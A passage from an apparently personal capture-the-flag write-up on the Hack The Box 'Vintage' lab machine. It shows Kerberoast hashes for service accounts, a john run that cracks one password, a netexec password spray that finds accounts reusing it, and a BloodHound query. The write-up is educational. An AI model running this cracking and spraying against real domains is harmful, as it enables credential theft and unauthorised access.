LDAP        dc01.vintage.htb 389    DC01             $krb5tgs$23$*svc_ark$VINTAGE.HTB$vintage.htb\svc_ark*$fbe5f5626fafa60bada3ad903106c79b$d0db933579be54f6344e172e1d989ef96bde764dfd82552d8a1ef4328ddb7cae2e70dcb3dfcea1c045e7eaf4d8499683467afcd33b700aedb2e93ce6a751c534153498781ed75eeab0d4e10bf4a56ad3fbe51e77b265959c9ce3e26a77cf5a4f2e51148f4b584540bfd4a66e74aadb90894683a9b4ab699fa69467da9b9c4510ecc8e6fa5b549b31afd05304f89bbd8fa2b71573e76367520173e158e5c6892a697725ee98b194dc9681895c59f3e1ce906ab419c5002916b6bf5c94d00705ef6422ca622d08b98823aead887f008482404fd168629cdab5ef5bac858c1b72ee332aef7575b016c87cb5ed1bfd07246c7b2a8e8925dc27b46261f1d85aa52111af521da77f84f99c93679ac8f02aa0295d1bc5dca206c9247dd6fcf65ce9a2ea526c452dfbfea9254b44597680ae91df1724a58ea053497ddf9a4910aa7bfec0825a90146336d0dd29a878373dc6681e8b9db90209736f3c3dc538414f4aaad1e096e2e002f36becd5208f383be069dbe294854c841d6f1831bfea201098db03aed75326696e95a90f3002b113371da9bb41ec480878ff85e5eee1e2535678db2cda03bcbbe28478f89faa0678217acdf9c2fb83bbff2ce54603c26b8e5b812502e431170ab45ad3a160507dc04f6a8fad0b3f3f87fa17c96cdd48fd00dcb5f70297a43792a5ce883de331baf8b7093df32256cacc4785d09418fb67c4d9dbcca7cd7c5312634c8c84c7359c00aecb475f7fe3c8bc06c9743d1594ade65433378bdfd479c54341712280cef649b427b0151567f29c5d7586d7fef123b9f0bc413a2dc2465fbcf684322e20ee15686e4bdc7e89c4d79b5373c1b012b6ace35d83d6f725b2a87a188538a00edf0b586e46237e36e59dc9f5d2358feb8ebe7686ea82decfc459999222b9d4815d913a66964fb759d3f7ada430aab27c93c0f39632daabaac9e70d1765bda87d9e4686ee6ac8f7de1eb35192ff513c85f2d4f242a6a15bc2f91b455534b53065e4970c07a3d06d50060d32fa2ebe1062586c1f3622a66767f3e531ed2078f4e901f75b214d6eaa2836712bec622edfbc7f5c202020dfe86f4b855af6cb361f7e5bb60c5d6f6cbf53002ca03612e9f95f92327c20842ef9d900c93bd5511a33fbcfccf738603aa49b63a9f2201478634dc3200541e87d19c469254ac6af2afcb6b2fe2c0786e7dd180810cb44d9167b1cc8e47792f4b6a52f68b4e15fcb6b5216be541653e33e7aaf91e5647c76bc5f06cb0b387b55a37a6b01aba6885f2131bc555c9a03ccda746401730e888d3880d04e4ae476621c2da5dbebef8dbe35a4e16bbafb10637cde8ab3d3c3be2f349f8cecc237ca9c993c956671ad4c9f7f60dd06e6682372d8ca9addc1fd0097a6d98cb03816fc740649e2e870edc81d152c7d0dff1dbe2fa52c6cd3b0d6cc1de763d74a81b5d77fb037b9                                                                                                                                                  
LDAP        dc01.vintage.htb 389    DC01             [*] sAMAccountName: svc_ldap, memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb, pwdLastSet: 2024-06-06 09:45:27.881830, lastLogon: &lt;never&gt;
LDAP        dc01.vintage.htb 389    DC01             $krb5tgs$23$*svc_ldap$VINTAGE.HTB$vintage.htb\svc_ldap*$0bc05fe75ce2c7b1fe6bed5e9d5b0ce9$a1b47ef6464943cd23bca365e1388c67cca726ae1e259d9b2189017add3b3e0de550df03f3b4e539c8071f181f3d18849b5c57b966046d8a2c74414105fd11530365bf1ad8f3f3d67e409ba690bd8e57eb13ce4ffea5945aa1c96ecf4d43154781baaa3f723e9c74f486720fa30bbd107944bb124ef46a8130c30e92d86f42a9dbe3a84f0aa06eaa0288babfccf8a25b7e5ae38bacfcc6eecf45a54780a40efc596e589a46d37793271143a944feb8e642ac7fbdf70cb89d912c88fbd6a73333c8689d0be5499c0a0664b7cf80fa98a07fa0fc6a6b07632b98a2e1156c1c7f0ed8088d84eeffb07d1f6cc41c68c5fd747b5d36ccd71df51da44be52a78d48ccd0dbfab33335e30541feeb54c3e9c8a68c7710dbea91c647d9de45ad490a840cd1d48e7de6fdc34d8b268de8766e2010542197b6d90f2d6c7cb0f1090c113efe5a0ccb175b7814c4a7323e9ec681d3a312a8a28dd49143fa8f18857bc4e5ce4c9ceccc4401324bf1e4e4def427761ac5ac2908269173edcef84c4a3d6fd78c062f11908bac77715d393c5c3e6807ad0ca79c6c37036cf68dfc4720ef119026bfbe697bccc705abd927bdd238c4082587ad172c91f346498b207cab88e04cb31d42e2ff2f1556495fe6599cc0184372a9f69301f5548f1d639b1da597c6dd1e79df649b187b245c5a4deb6e6ca327ee1bb5ed0aac7a0244cf75c7c10552e2a4b39cb32f8907a002d3d79713c000d2922efd8efe82d04e08f2e4b9a72f2560a1b865ea29223847c1375b9502601920d6c2b644b78d3451224ed185f4bddec80e38fe470892ca7df98157cc6fb672cbeb395c27a8a0057e7802dd80c3746837de50b3dbe502756b9657ab93658240e5ea9b37b2a363ee408f3cf85bc2e79d773afd662fd83f54255ca9b35aa19409dc9c401168b16d577cae771acc85f7c312d96b906c5fc36bede922a48c670689a8207616b70deecac4119b48749d2018c64976c02907b69bf20ef366a4ac03c283876b3ec78b2b8f5a11a96880a2519cd29e61c0457ab65bae96998737338a8bef72644686741c8981a29ddc9bdb1bd2769a32bcbabfa861d14ed7eff71119c205b8b596f28e749a3b3787b020e3866cf5f817ace0c93aa6c8eb5d4a1dbe21cb51d81892443469f955fc9c06f4740ae0745872beb44cc23b0771214692d3987373afc361f113269dc4ceacb0f8c3122c0afe4baeac849f7fef379255dfa972ba21ee2f038e40b5fad4e029ab4c294f7b4a2ccfa7c12541f371539c9e0adc55cfb8898aa383e48661b6ab9b1e56c956147e0f306a7b67c28b8faa563e429a565a9d07ff7afff69a1c10b236de4ac7ad60aefa03e5a076f1398fc1e62ea69399ef8503efe8b497a327641c79a3a114b146ce33b32ad8b09fd7711eaa0482916dfb49a4ced88f5567b93f32944c743600c16dca75d725ebf                                                                                                                                                
LDAP        dc01.vintage.htb 389    DC01             [*] sAMAccountName: svc_sql, memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb, pwdLastSet: 2026-04-07 00:12:04.505417, lastLogon: &lt;never&gt;
LDAP        dc01.vintage.htb 389    DC01             $krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb\svc_sql*$01671601babce09671e09c4ca23968f6$17295c765b73503eb4b33e6d0beb480f45abd78efd419a1fe9eda5741b44181a4fec04a2ade3f77af6b0e0b6da3495a1903d244ba2569f8848360088e2e6302d1eb13d68abc18ad35ccb5f27bf26cd6a185d9e21e4aaaa1cc6177ee367556837132b2d91a7eb3b4d4ff33b473541fceaa0e9f75039cd318b3a6882db223c1aa15f1015c6663831dab2635c69702b461753da73226cdbed57c1d596fe553ba1b3b37589e27e38412f7b3b58f0caa7768c2e817ca63b2a423457e02de76296605ff5cfa8efb38580c59fab92578bd5563b4fd31c5b98ecdd436d3d0743cfb9055c80f2a482f70face8351bb1b12d8f25267b0e65de06e168b886ee0aabb3ccddf03f500194e14ac24a0089b5c40671787467b7960fed2d4b2afc8fc097cfd5243c2a5d4d77e13fac5be99335649b5856a51f2c52a4c15c1770f2a4fe27f3e579a52dcf895dbe9191048f573dac2ed11bf8ef1512ea75ba96116b7fc6f52a4d22f89d544ecb761a964e0ad6a20964ed485e5360df701695a09f7a1ee18aa8df5bc530e50dd2e5f48483c25b466172b47158d8d0800cb2a56a6185d88d13d5ade19366ff05fd67283c764c4ea15f33090e187464f52fc1b015e6e1b37a359434821c13fec48d776b05a4161f177102e19ea78805f143596a1368e848f78f318033789d22f77d77ef4f69951081a14ea27499f171b7640e98a817b626ddcd3285f66c9ec225f35e8e59018fc2002c3bbbcc141e99d41df185fe1dacbc2c2db5e48f73a28578a98e29470a45fa1de66824d0b23031ffa3ff6fd7e56c1330eb9db2947a3995c6276a50a0e343e64cc33c814bd74126f8bb6a267de577fbd3e22ddfff3faa9bf1fdcccdbc4904a628b17710ae19c7cef6f66bcf58172fa3158534e048c2358e42c2e8207c169efb603a0e6dc9f0bcf899b72a0a61a9298544351afe5b276f7cde6a89a58e93e2db513f58600ba982801aa01d2390246a999bdaa0c94d46a4a796b9cd3d8a4055bf83e5693b1c9f7f908fa7c7f440313478dad0f0308092a5c02a332f9e61f8e0fa636a71dab94ed55014bd3faf7b2deb07f6ea49273142f1a0adb0e2de95c6d3b3dad7e940848019b16cdeab4f51383eb3f30bc35f31be46e0aff38998e1f0af8cacd023f6cb0c08240fc700b16922d2c2b25cfe9f4c314ab24c7027853baf6a8f7d40c8f60251c1ef9c75aca4bec1cc59083f70d3e80c26df898763d758f4f7472a3447de5ec7443193ad8cfa7f342ef8868c4b42bff4b29e4c08f279a3b5c536f503c9b3dcffa908bd03ef72cc181ba632b5e81139ec58af02221c987e0410ecb6619338421cc7e411e499e5b9bc646f237bccf0c2b868e6c106a6a175c2a9e08a969dcc6c3453e77fc686a5d96aa8d98bba741f09897a52ec31314accc7c8c56b377f11823ebe3718f8376425fc4f2d82f26445592ca94f37</code></pre></div><p>clean, we&#8217;ve got all of those 3 SVC account:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ wc -l out.hash 
3 out.hash</code></pre></div><p>Let&#8217;s recover the hash:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ john out.hash --wordlist=/usr/share/wordlists/rockyou.txt                                 
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Zer0the0ne       (?)     
1g 0:00:00:12 DONE (2026-04-07 00:27) 0.08333g/s 1195Kp/s 2477Kc/s 2477KC/s !!12Honey..*7&#161;Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.</code></pre></div><p>And all of those 3 hash we only got one recovered!!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc01.vintage.htb -u users.txt -p Zer0the0ne -k --continue-on-success                                              
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\Administrator:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\Guest:Zer0the0ne KDC_ERR_CLIENT_REVOKED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\krbtgt:Zer0the0ne KDC_ERR_CLIENT_REVOKED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\M.Rossi:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\R.Verdi:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\L.Bianchi:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\G.Viola:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\C.Neri:Zer0the0ne 
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\P.Rosa:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\svc_sql:Zer0the0ne 
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\svc_ldap:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\svc_ark:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\C.Neri_adm:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\L.Bianchi_adm:Zer0the0ne KDC_ERR_PREAUTH_FAILED</code></pre></div><p>Man, we got lucky since that password is re-usable and also owned by others, we now have 2 new pairs:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">user: svc_sql 
passwd: Zer0the0ne </code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">user: C.Neri
passwd: Zer0the0ne</code></pre></div><ol start="6"><li><p><em>Local User Enumeration</em></p></li></ol><p>Supposed our new user &#8220;C.Neri&#8220; have higher access since my last check on SVC have nothing:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc01.vintage.htb -u C.Neri -p Zer0the0ne -k                        
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\C.Neri:Zer0the0ne</code></pre></div><p>&#8220;C.Neri&#8221; user indicated have 2 account, seems identical.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!sYn9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24e16760-fe78-4722-b375-ae1231f3eacf_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!sYn9!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24e16760-fe78-4722-b375-ae1231f3eacf_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!sYn9!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24e16760-fe78-4722-b375-ae1231f3eacf_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!sYn9!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24e16760-fe78-4722-b375-ae1231f3eacf_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!sYn9!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24e16760-fe78-4722-b375-ae1231f3eacf_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!sYn9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24e16760-fe78-4722-b375-ae1231f3eacf_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/24e16760-fe78-4722-b375-ae1231f3eacf_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:131392,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24e16760-fe78-4722-b375-ae1231f3eacf_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!sYn9!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24e16760-fe78-4722-b375-ae1231f3eacf_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!sYn9!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24e16760-fe78-4722-b375-ae1231f3eacf_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!sYn9!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24e16760-fe78-4722-b375-ae1231f3eacf_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!sYn9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24e16760-fe78-4722-b375-ae1231f3eacf_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;sql&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-sql">MATCH (u:User) WHERE u.name STARTS WITH 'C.NERI' RETURN u</code></pre></div><p>But ours currently just regular and not ADM (Admin?).</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!89PK!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1891ae3-447c-40ac-b711-7b9a9e994308_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!89PK!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1891ae3-447c-40ac-b711-7b9a9e994308_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!89PK!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1891ae3-447c-40ac-b711-7b9a9e994308_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!89PK!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1891ae3-447c-40ac-b711-7b9a9e994308_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!89PK!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1891ae3-447c-40ac-b711-7b9a9e994308_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!89PK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1891ae3-447c-40ac-b711-7b9a9e994308_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f1891ae3-447c-40ac-b711-7b9a9e994308_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:105327,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1891ae3-447c-40ac-b711-7b9a9e994308_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!89PK!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1891ae3-447c-40ac-b711-7b9a9e994308_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!89PK!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1891ae3-447c-40ac-b711-7b9a9e994308_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!89PK!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1891ae3-447c-40ac-b711-7b9a9e994308_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!89PK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1891ae3-447c-40ac-b711-7b9a9e994308_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Regular user &#8220;C.Neri&#8220; also have 3 OOB but it&#8217;s the same as people inside the &#8220;ServiceManagers&#8220; group, which now we didn&#8217;t needed to:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!biwJ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffc84bce5-0da4-4c77-95fe-d00112230978_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!biwJ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffc84bce5-0da4-4c77-95fe-d00112230978_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!biwJ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffc84bce5-0da4-4c77-95fe-d00112230978_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!biwJ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffc84bce5-0da4-4c77-95fe-d00112230978_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!biwJ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffc84bce5-0da4-4c77-95fe-d00112230978_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!biwJ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffc84bce5-0da4-4c77-95fe-d00112230978_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/fc84bce5-0da4-4c77-95fe-d00112230978_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:176119,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffc84bce5-0da4-4c77-95fe-d00112230978_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!biwJ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffc84bce5-0da4-4c77-95fe-d00112230978_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!biwJ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffc84bce5-0da4-4c77-95fe-d00112230978_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!biwJ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffc84bce5-0da4-4c77-95fe-d00112230978_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!biwJ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffc84bce5-0da4-4c77-95fe-d00112230978_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 